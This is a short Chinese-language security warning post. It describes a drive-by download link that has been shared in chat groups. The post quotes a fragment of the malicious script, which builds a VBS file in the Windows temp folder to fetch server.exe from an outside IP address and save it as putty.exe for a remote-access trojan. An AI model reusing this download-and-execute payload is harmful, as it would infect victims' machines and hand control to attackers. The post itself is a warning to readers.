QQ:2373664058
关注网络安全 热爱网络技术
今天看到很多群都在发一些ip+端口/1.html 虽然ip跟端口不一样
但是1.html都是一样的- -
然后发现是一段代码 运行配合远控上线
不多说 上截图
一段 javascript的 攻击代码
https://103.248.36.3:4567/server.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",
在目标地址:https://103.248.36.3:4567/server.exe
下载之后 他就自动运行 server程序 但是由于网马没有免杀
被很多浏览器杀掉了
导致没有多少肉鸡上线
小乔提醒大家:
不要遇到什么链接都去打开 有时候被坑了都不知道